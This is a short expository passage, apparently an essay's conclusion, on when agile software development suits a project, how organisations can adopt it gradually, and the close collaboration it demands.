Agile development belongs to a specific group of people who clearly understand its significance. It has its own drawbacks and is not suitable for every type and size of software project, but it can be used successfully for reasonably sized projects with a maximum team size of around 100 developers. An organization should adopt agile development in steps, starting with a small project that fits the agile methods. Agile development is also a boon when customers are highly collaborative and act as stakeholders throughout the project, alongside the developers. Agile methods are still too young for the boundary conditions of a suitable software project to be drawn precisely. The decision to choose agile methods should ideally rest with the people involved, who are best placed to judge whether they can sustain the intense collaboration the approach demands. If not, it is better not to follow any agile method, since a lack of willingness to adapt to this style of development may ruin the project. With all its pros and cons, however, agile development is gaining immense popularity among organizations across the globe that believe in simplicity in designing and developing software with effective collaboration between project stakeholders.